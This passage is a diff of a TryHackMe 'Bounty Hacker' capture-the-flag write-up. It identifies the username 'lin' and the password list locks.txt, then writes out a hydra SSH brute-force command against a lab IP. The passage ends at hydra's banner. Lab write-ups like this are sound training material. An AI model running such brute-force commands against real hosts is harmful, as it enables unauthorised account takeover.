Cyberretta/Write-Ups-THM/Bounty_Hacker.md

 -lin
 ```

-We have a possible username "lin".
-The file locks.txt seems to be a password list.
+We have a possible username `lin`.
+The file `locks.txt` seems to be a password list.

 **Question : Who wrote the task list ?**
 **Answer : lin**

 ## SSH bruteforce

-Since we have a username "lin" and a password list, we can try to brute force some services on the target.
-Let's try with SSH first using [Hydra](https://github.com/vanhauser-thc/thc-hydra) :
+Since we have a username `lin` and a password list, we can try to brute force some services on the target.
+Let's try with `SSH` first using [hydra](https://github.com/vanhauser-thc/thc-hydra) :
 ```
 attacker@AttackBox:~/Documents/THM/CTF/Bounty_Hacker$ hydra -l lin -P locks.txt 10.10.198.38 ssh
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).